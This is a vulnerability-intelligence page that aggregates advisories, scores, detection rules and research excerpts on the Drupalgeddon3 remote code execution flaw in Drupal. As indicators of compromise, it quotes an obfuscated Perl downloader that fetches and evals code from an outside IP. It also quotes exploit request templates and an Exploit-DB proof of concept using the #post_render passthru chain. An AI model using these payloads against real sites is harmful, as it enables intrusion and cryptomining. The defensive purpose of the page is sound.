CVE-2018-7602
published 2018-07-19CVE-2018-7602: A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack…
PriorityP197critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2022-05-04
Exploited in the wild
EPSS
99.24%
99.9th percentile
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.
Affected
19 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| drupal | core | >= 7.0 < 7.59 | 7.59 |
| drupal | core | >= 8.0 < 8.4.8 | 8.4.8 |
| drupal | core | >= 8.0.0 < 8.4.8 | 8.4.8 |
| drupal | core | >= 8.5 < 8.5.3 | 8.5.3 |
| drupal | core | >= 8.5.0 < 8.5.3 | 8.5.3 |
| drupal | core | >= unspecified < 7.59 | 7.59 |
| drupal | core | >= unspecified < 8.5.3 | 8.5.3 |
| drupal | core | >= unspecified < 8.4.8 | 8.4.8 |
| drupal | drupal | — | — |
| drupal | drupal | >= 7.0 < 7.59 | 7.59 |
| drupal | drupal | >= 7.0 < 7.59 | 7.59 |
| drupal | drupal | >= 8.0 < 8.4.8 | 8.4.8 |
| drupal | drupal | >= 8.4.0 < 8.4.8 | 8.4.8 |
| drupal | drupal | >= 8.5 < 8.5.3 | 8.5.3 |
| drupal | drupal | >= 8.5.0 < 8.5.3 | 8.5.3 |
| drupal | drupal_core | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandsh -c p$(printf e)rl -e 'BEGIN{$0=$$};use IO::Socket::INET;if(my$c=new IO::Socket::INET(PeerAddr=>"147.52.43.159:80")){print $c $_."\r\n" for (q{GET /sites/z.html HTTP/1.1},q{Host:147.52.43.159},q{User-Agent: Mozilla/5.0},q{});my$x;{local$/=undef;$x=};while($x=~s/(.*)\r\n//){last if$x=~/^$/;}eval($x);}'↗
url/?q=user%2Flogin
url/?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}}
command/?q={{userid}}/cancel&destination={{userid}}/cancel?q[#post_render][]=passthru&q[#type]=markup&q[#markup]=echo COP-2067-8102-EVC | rev
- →Exploit chain uses the `destination` parameter with `#post_render` callback set to `passthru` to achieve RCE — look for URL-encoded `%23post_render` or `#post_render` in Drupal HTTP requests targeting `/cancel` endpoints
- →Post-exploitation: watch for Apache worker processes spawning `sh -c perl` or obfuscated `p$(printf e)rl` shell commands downloading remote Perl scripts ↗
- →Exploit uses the `file/ajax/actions/cancel/#options/path/` endpoint with a `form_build_id` parameter — monitor for POST requests to this Drupal AJAX path
- →Shodan query `http.component:"drupal"` can be used to identify exposed Drupal instances for proactive scanning
- →Multiple Perl processes running simultaneously with `monero7` as a parameter is a strong indicator of post-exploitation cryptomining activity ↗
- ·The attack hides the `perl` invocation using shell obfuscation (`p$(printf e)rl`) to evade simple string-match detections on process names ↗
- ·The Perl script embeds 16 hex-encoded GZIP-compressed ELF objects loaded at runtime — file-based detections must cover both the zipped and unzipped versions of each ELF object ↗
- ·CVE-2018-7602 exploitation requires an authenticated session (valid Drupal login) as part of the exploit chain — the PoC template performs a login step before triggering RCE
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv9.8CRITICAL
vulncheck9.8CRITICAL
cisa9.8CRITICAL
vendor_ubuntu3.5LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Drupal Core Remote Code Execution Vulnerability
osv·2024-04-23
CVE-2018-7602 [CRITICAL] Drupal Core Remote Code Execution Vulnerability
Drupal Core Remote Code Execution Vulnerability
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.
GHSA
Drupal Core Remote Code Execution Vulnerability
ghsa·2024-04-23
CVE-2018-7602 [CRITICAL] CWE-94 Drupal Core Remote Code Execution Vulnerability
Drupal Core Remote Code Execution Vulnerability
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.
OSV
drupal7 vulnerabilities
osv·2021-03-15·CVSS 3.5
CVE-2018-7600 [LOW] drupal7 vulnerabilities
drupal7 vulnerabilities
It was discovered that Drupal did not properly process certain input. An
attacker could use this vulnerability to execute arbitrary code or
completely compromise a Drupal site. (CVE-2018-7600, CVE-2018-7602)
It was discovered that password reset URLs in Drupal could be forged. An
attacker could use this vulnerability to gain access to another user's
account. This issue affected only Ubuntu 14.04 ESM. (CVE-2015-2559)
It was discovered that Drupal did not properly protect against open
redirects. An attacker could use this vulnerability to send unsuspecting
users to 3rd party sites and potentially carry out phishing attacks.
This issue affected only Ubuntu 14.04 ESM. (CVE-2015-2749, CVE-2015-2750)
OSV
CVE-2018-7602: A remote code execution vulnerability exists within multiple subsystems of Drupal 7
osv·2018-07-19·CVSS 9.8
CVE-2018-7602 [CRITICAL] CVE-2018-7602: A remote code execution vulnerability exists within multiple subsystems of Drupal 7
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.
OSV
CVE-2018-7602: A remote code execution vulnerability exists within multiple subsystems of Drupal 7
osv·2018-04-25
CVE-2018-7602 CVE-2018-7602: A remote code execution vulnerability exists within multiple subsystems of Drupal 7
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to [Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002](/sa-core-2018-002). Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.
*Updated — this vulnerability is being exploited in the wild.*
VulnCheck
Drupal Core Remote Code Execution Vulnerability
vulncheck·2018·CVSS 9.8
CVE-2018-7602 [CRITICAL] Drupal Core Remote Code Execution Vulnerability
Drupal Core Remote Code Execution Vulnerability
A remote code execution vulnerability exists within multiple subsystems of Drupal that can allow attackers to exploit multiple attack vectors on a Drupal site.
Affected: Drupal Drupal Core
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.cve.org/CVERecord?id=CVE-2018-7602; https://www.csk.gov.in/alerts/STOP_ransomware.html; https://know.netenrich.com/blog/ragnar-locker-petya-and-ryuk-know-your-ransomware/; https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.group-ib.com/blog/shadowsilk/; https://fortiguard.fortinet.com/threat-signal-report/619
CISA
Drupal Core Remote Code Execution Vulnerability
cisa·2022-04-13·CVSS 9.8
CVE-2018-7602 [CRITICAL] Drupal Core Remote Code Execution Vulnerability
Vulnerability: Drupal Core Remote Code Execution Vulnerability
Affected: Drupal Core
A remote code execution vulnerability exists within multiple subsystems of Drupal that can allow attackers to exploit multiple attack vectors on a Drupal site.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2018-7602
Remediation Due Date: 2022-05-04
Ubuntu
Drupal vulnerabilities
vendor_ubuntu·2021-03-15·CVSS 3.5
CVE-2018-7600 [LOW] Drupal vulnerabilities
Title: Drupal vulnerabilities
Summary: Several security issues were fixed in Drupal.
It was discovered that Drupal did not properly process certain input. An
attacker could use this vulnerability to execute arbitrary code or
completely compromise a Drupal site. (CVE-2018-7600, CVE-2018-7602)
It was discovered that password reset URLs in Drupal could be forged. An
attacker could use this vulnerability to gain access to another user's
account. This issue affected only Ubuntu 14.04 ESM. (CVE-2015-2559)
It was discovered that Drupal did not properly protect against open
redirects. An attacker could use this vulnerability to send unsuspecting
users to 3rd party sites and potentially carry out phishing attacks.
This issue affected only Ubuntu 14.04 ESM. (CVE-2015-2749, CVE-2015-2750)
Instru
Drupal
Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-004
vendor_drupal·2018-04-25
CVE-2018-7602 [CRITICAL] Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-004
Title: Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-004
Vulnerability Type: Remote Code Execution
Description: A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002 . Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild. Updated — this vulnerability is being exploited in the wild.
Solution: Upgrade to the most recent version of Drupal 7 or 8 core. If you are running 7.x, upgrade to Drupal 7.59 . If you are running 8.5.x, upgrade to Drupal 8.5.3 . If you are run
Drupal
Drupal 7 and 8 core critical release on April 25th, 2018 - PSA-2018-003
vendor_drupal·2018-04-23·CVSS 9.8
CVE-2018-7602 [CRITICAL] Drupal 7 and 8 core critical release on April 25th, 2018 - PSA-2018-003
Title: Drupal 7 and 8 core critical release on April 25th, 2018 - PSA-2018-003
Vulnerability Type: Drupal 7 and 8 core critical release on April 25th, 2018
Description: There will be a security release of Drupal 7.x, 8.4.x, and 8.5.x on April 25th, 2018 between 16:00 - 18:00 UTC . This PSA is to notify that the Drupal core release is outside of the regular schedule of security releases. For all security updates, the Drupal Security Team urges you to reserve time for core updates at that time because there is some risk that exploits might be developed within hours or days. Security release announcements will appear on the Drupal.org security advisory page. This security release is a follow-up to the one released as SA-CORE-2018-002 on March 28. Sites on 7.x or 8.5.x can immediately update
Suricata
ET WEB_SPECIFIC_APPS Drupal RCE (CVE-2018-7602)
suricata·2018-04-26·CVSS 9.8
CVE-2018-7602 [CRITICAL] ET WEB_SPECIFIC_APPS Drupal RCE (CVE-2018-7602)
ET WEB_SPECIFIC_APPS Drupal RCE (CVE-2018-7602)
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Drupal RCE (CVE-2018-7602)"; flow:established,to_server; http.method; content:"POST"; nocase; http.uri; content:"/?q=node"; content:"delete&destination="; pcre:"/(?:%(?:25)?23|#)/"; http.request_body; content:"form_id=node_delete_confirm"; fast_pattern; reference:url,www.bleepingcomputer.com/news/security/hackers-dont-give-site-owners-time-to-patch-start-exploiting-new-drupal-flaw-within-hours; reference:cve,2018-7602; classtype:attempted-user; sid:2025533; rev:4; metadata:affected_product Drupal_Server, attack_target Web_Server, created_at 2018_04_26, deployment Datacenter, signature_severity Minor, tag drupalgeddon, tag CISA_KEV, updated_at 2024_03_07;)
Exploit-DB
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)
exploitdb·2018-04-30·CVSS 9.8
CVE-2018-7602 [CRITICAL] Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)
Drupal 'Drupalgeddon3',
'Description' => %q{
CVE-2018-7602 / SA-CORE-2018-004
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x.
This potentially allows attackers to exploit multiple attack vectors on a Drupal site
Which could result in the site being compromised.
This vulnerability is related to Drupal core - Highly critical - Remote Code Execution
The module can load msf PHP arch payloads, using the php/base64 encoder.
The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));'
},
'License' => MSF_LICENSE,
'Author' =>
[
'SixP4ck3r', # Research and port to MSF
'Blaklis' # Initial PoC
],
'References' =>
[
['SA-CORE', '2018-004'],
['CVE', '2018-7602'],
],
'DefaultOptions' =>
{
'encoder' => 'php/base64',
'payload' => 'p
Exploit-DB
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)
exploitdb·2018-04-25·CVSS 9.8
CVE-2018-7602 [CRITICAL] Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)
---
This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602.
You must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).
POST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1
[...]
form_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]
Retrieve the form_build_id from the response, and then triggering the exploit with :
POST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1
[...]
form_build_id=[FORM_BUILD_ID]
This will display the result of the whoami com
Nuclei
Drupal - Remote Code Execution
nuclei·CVSS 9.8
CVE-2018-7602 [CRITICAL] Drupal - Remote Code Execution
Drupal - Remote Code Execution
Drupal 7.x and 8.x contain a remote code execution vulnerability that exists within multiple subsystems. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.
Template:
id: CVE-2018-7602
info:
name: Drupal - Remote Code Execution
author: princechaddha
severity: critical
description: Drupal 7.x and 8.x contain a remote code execution vulnerability that exists within multiple subsystems. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in
Bugzilla
CVE-2018-7602 drupal7: drupal: Remote code execution vulnerability SA-CORE-2018-004 [fedora-all]
bugzilla·2018-04-26·CVSS 9.8
CVE-2018-7602 [CRITICAL] CVE-2018-7602 drupal7: drupal: Remote code execution vulnerability SA-CORE-2018-004 [fedora-all]
CVE-2018-7602 drupal7: drupal: Remote code execution vulnerability SA-CORE-2018-004 [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple
Bugzilla
CVE-2018-7602 drupal8: drupal: Remote code execution vulnerability SA-CORE-2018-004 [fedora-all]
bugzilla·2018-04-26·CVSS 9.8
CVE-2018-7602 [CRITICAL] CVE-2018-7602 drupal8: drupal: Remote code execution vulnerability SA-CORE-2018-004 [fedora-all]
CVE-2018-7602 drupal8: drupal: Remote code execution vulnerability SA-CORE-2018-004 [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple
Bugzilla
CVE-2018-7602 drupal: Remote code execution vulnerability SA-CORE-2018-004
bugzilla·2018-04-26·CVSS 9.8
CVE-2018-7602 [CRITICAL] CVE-2018-7602 drupal: Remote code execution vulnerability SA-CORE-2018-004
CVE-2018-7602 drupal: Remote code execution vulnerability SA-CORE-2018-004
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised.
Upstream patches:
Drupal 8.x: https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&id=bb6d396609600d1169da29456ba3db59abae4b7e
Drupal 7.x: https://cgit.drupalcode.org/drupal/rawdiff/?h=7.x&id=080daa38f265ea28444c540832509a48861587d0
External References:
https://www.drupal.org/sa-core-2018-004
Discussion:
Created drupal8 tracking bugs for this issue:
Affects: fedora-all [bug 1572101]
Created drupal7 tracking bugs for this issue:
Affects: fedora-all [bug 1572100]
Affects: epel-all
Bugzilla
CVE-2018-7602 drupal7: drupal: Remote code execution vulnerability SA-CORE-2018-004 [epel-all]
bugzilla·2018-04-26·CVSS 9.8
CVE-2018-7602 [CRITICAL] CVE-2018-7602 drupal7: drupal: Remote code execution vulnerability SA-CORE-2018-004 [epel-all]
CVE-2018-7602 drupal7: drupal: Remote code execution vulnerability SA-CORE-2018-004 [epel-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of epel-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple sup
arXiv
ATTACK2VEC: Leveraging Temporal Word Embeddings to Understand the Evolution of Cyberattacks
arxiv_fulltext·2019-05-29
ATTACK2VEC: Leveraging Temporal Word Embeddings to Understand the Evolution of Cyberattacks
: Leveraging Temporal Word Embeddings to
Understand the Evolution of Cyberattacks
## Abstract
Despite the fact that cyberattacks are constantly growing in complexity, the research community still lacks effective tools to easily monitor and understand them.
In particular, there is a need for techniques that are able to not only track how prominently certain malicious actions, such as the exploitation of specific vulnerabilities, are exploited in the wild, but also (and more importantly) how these malicious actions factor in as attack steps in more complex cyberattacks.
In this paper we present , a system that uses temporal word embeddings to model how attack steps are exploited in the wild, and track how they evolve.
We test on a dataset of billions of security events collected from the c
Tenable
CVE-2026-9082: Highly Critical SQL Injection Vulnerability in Drupal Core (SA-CORE-2026-004)
blogs_tenable·2026-05-21·CVSS 6.5
CVE-2026-9082 [MEDIUM] CVE-2026-9082: Highly Critical SQL Injection Vulnerability in Drupal Core (SA-CORE-2026-004)
## Exposure Management
## Explore By Use Case
## Explore By Industry
## Tenable is the one clear leader in Exposure Management
## Exposure management
resource center
## Accelerate your exposure management strategy with practical resources and tools.
## Explore By Use Case
## Explore By Industry
## Tenable is the one clear leader in Exposure Management
## Exposure management
resource center
## Accelerate your exposure management strategy with practical resources and tools.
## CVE-2026-9082: Highly Critical SQL Injection Vulnerability in Drupal Core (SA-CORE-2026-004)
A highly critical SQL injection vulnerability in Drupal core's database abstraction layer affects sites running PostgreSQL.
## Key Takeaways
CVE-2026-9082 is a highly critical SQL injection vulnerabi
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
CVE-2020-28188 [HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
# Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020. Several newly observed exploits, including CVE-2020-28188, CVE-2020-17519, and CVE-2020-29227, have emerged and were continuously being exploited in the wild as of late 2020 to early 2021.
This blog provides details of the newly observed exploits as well as a dive deep into the exploitation analysis, vendor analysis, attack origin, and attack category distribution.
Palo Alto Networks Next-Generation Firewall customers are protected from these attacks with the URL Filtering an
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
[HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
Threat Research Center
Trend Reports
Vulnerabilities
## Network Attack Trends: Internet of Threats (November 2020-January 2021)
Lei Xu
Yue Guan
Vaibhav Singhal
Published: April 12, 2021
Malware
Trend Reports
Vulnerabilities
Botnet
DDoS
Exploit kit
IoT
Network security trends
## Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020 . Several newly observed exploits, including CVE-2020-28188 , CVE-2020-17519 , and CVE-2020-29227 , have emerged and were continuously being exploited in the wild as of late 2020 to earl
Tenable
Drupalgeddon Attacks Continue on Sites Missing Security Updates (CVE-2018-7600, CVE-2018-7602)
blogs_tenable·2018-11-20·CVSS 9.8
[CRITICAL] Drupalgeddon Attacks Continue on Sites Missing Security Updates (CVE-2018-7600, CVE-2018-7602)
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
Drupalgeddon Attacks Continue on Sites Missing Security Updates (CVE-2018-7600, CVE-2018-7602)
blogs_tenable·2018-11-20·CVSS 7.0
CVE-2018-7600 [HIGH] Drupalgeddon Attacks Continue on Sites Missing Security Updates (CVE-2018-7600, CVE-2018-7602)
Blog / Cyber Exposure Alerts
Subscribe
# Drupalgeddon Attacks Continue on Sites Missing Security Updates (CVE-2018-7600, CVE-2018-7602)
Satnam Narang
November 20, 2018
2 Min Read
Recent attacks targeting Drupal instances vulnerable to Drupalgeddon 2 and Drupalgeddon 3 highlight the importance of identifying and patching vulnerable sites.
#### Background
In March 2018, Drupal published a security advisory, SA-CORE-2018-002 that addressed a critical Remote Code Execution (RCE) vulnerability with a CVE identifier of CVE-2018-7600. Tenable’s Security Response Team published a blog as well.
A few weeks after the publication of this security advisory, researchers at Check Point Software Technologies and Dofinity published “Uncovering Drupalgeddon 2.0,” providing technical details about C
Sentinelone
Drupal Exploit on Linux - SentinelOne Detection and Response Case Study
blogs_sentinelone·2018-06-26·CVSS 9.8
[CRITICAL] Drupal Exploit on Linux - SentinelOne Detection and Response Case Study
## Introduction
SentinelOne Vigilance is a managed service provided by a group of highly trained cyber security analysts. It offers another layer of security to IT teams by accelerating the detection, prioritization, and response to advanced cyber threats and reducing the risk of missing a critical alert that goes undetected. The Vigilance analysts assess the suspicious alerts, review raw threat data, process operations, and network connections, and analyze samples, as needed. They also correlate the information with threat intelligence feeds, analyze low level log data, and collaborate with security researchers to identify and prioritize events. Quite often the group investigates interesting cases. A recent Vigilance case is the subject of this article.
Recently, SentinelOne was called
Sentinelone
Drupal Exploit on Linux
blogs_sentinelone·2018-06-26·CVSS 9.8
[CRITICAL] Drupal Exploit on Linux
## Introduction
SentinelOne Vigilance is a managed service provided by a group of highly trained cyber security analysts. It offers another layer of security to IT teams by accelerating the detection, prioritization, and response to advanced cyber threats and reducing the risk of missing a critical alert that goes undetected. The Vigilance analysts assess the suspicious alerts, review raw threat data, process operations, and network connections, and analyze samples, as needed. They also correlate the information with threat intelligence feeds, analyze low level log data, and collaborate with security researchers to identify and prioritize events. Quite often the group investigates interesting cases. A recent Vigilance case is the subject of this article.
Recently, SentinelOne was called
Trendmicro
Drupal Bug Exploited to Deliver Monero-Mining Malware
blogs_trendmicro·2018-06-21·CVSS 9.8
CVE-2018-7602 [CRITICAL] Drupal Bug Exploited to Deliver Monero-Mining Malware
Malware
# Drupal Bug Exploited to Deliver Monero-Mining Malware
We were able to observe a series of network attacks exploiting, a security flaw (CVE-2018-7602) in the Drupal content management framework. For now, these attacks aim to turn affected systems into Monero-mining bots.
By: Smart Home Network Team, IoT Reputation Service Team
2018/06/21
Read time: ( words)
Save to Folio
We were able to observe a series of network attacks exploiting CVE-2018-7602, a security flaw in the Drupal content management framework. For now, these attacks aim to turn affected systems into Monero-mining bots. Of note are its ways of hiding behind the Tor network to elude detection and how it checks the affected system first before infecting it with a cryptocurrency-mining malware. While these attacks c
Trendmicro
Drupal Bug Exploited to Deliver Monero-Mining Malware
blogs_trendmicro·2018-06-21·CVSS 9.8
CVE-2018-7602 [CRITICAL] Drupal Bug Exploited to Deliver Monero-Mining Malware
Malware
## Drupal Bug Exploited to Deliver Monero-Mining Malware
We were able to observe a series of network attacks exploiting, a security flaw (CVE-2018-7602) in the Drupal content management framework. For now, these attacks aim to turn affected systems into Monero-mining bots.
By: Smart Home Network Team, IoT Reputation Service Team 2018/06/21 Read time: ( words)
Save to Folio
We were able to observe a series of network attacks exploiting CVE-2018-7602 , a security flaw in the Drupal content management framework. For now, these attacks aim to turn affected systems into Monero-mining bots. Of note are its ways of hiding behind the Tor network to elude detection and how it checks the affected system first before infecting it with a cryptocurrency-mining malware. While these attacks
Trendmicro
Drupal Bug Exploited to Deliver Monero-Mining Malware
blogs_trendmicro·2018-06-21·CVSS 9.8
CVE-2018-7602 [CRITICAL] Drupal Bug Exploited to Deliver Monero-Mining Malware
Malware
## Drupal Bug Exploited to Deliver Monero-Mining Malware
We were able to observe a series of network attacks exploiting, a security flaw (CVE-2018-7602) in the Drupal content management framework. For now, these attacks aim to turn affected systems into Monero-mining bots.
By: Smart Home Network Team, IoT Reputation Service Team Jun 21, 2018 Read time: ( words)
Save to Folio
We were able to observe a series of network attacks exploiting CVE-2018-7602 , a security flaw in the Drupal content management framework. For now, these attacks aim to turn affected systems into Monero-mining bots. Of note are its ways of hiding behind the Tor network to elude detection and how it checks the affected system first before infecting it with a cryptocurrency-mining malware. While these attack
http://www.securityfocus.com/bid/103985http://www.securitytracker.com/id/1040754https://lists.debian.org/debian-lts-announce/2018/04/msg00030.htmlhttps://www.debian.org/security/2018/dsa-4180https://www.drupal.org/sa-core-2018-004https://www.exploit-db.com/exploits/44542/https://www.exploit-db.com/exploits/44557/http://www.securityfocus.com/bid/103985http://www.securitytracker.com/id/1040754https://lists.debian.org/debian-lts-announce/2018/04/msg00030.htmlhttps://www.debian.org/security/2018/dsa-4180https://www.drupal.org/sa-core-2018-004https://www.exploit-db.com/exploits/44542/https://www.exploit-db.com/exploits/44557/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2018-7602
2018-07-19
Published
2022-04-13
Added to CISA KEV
Exploited in the wild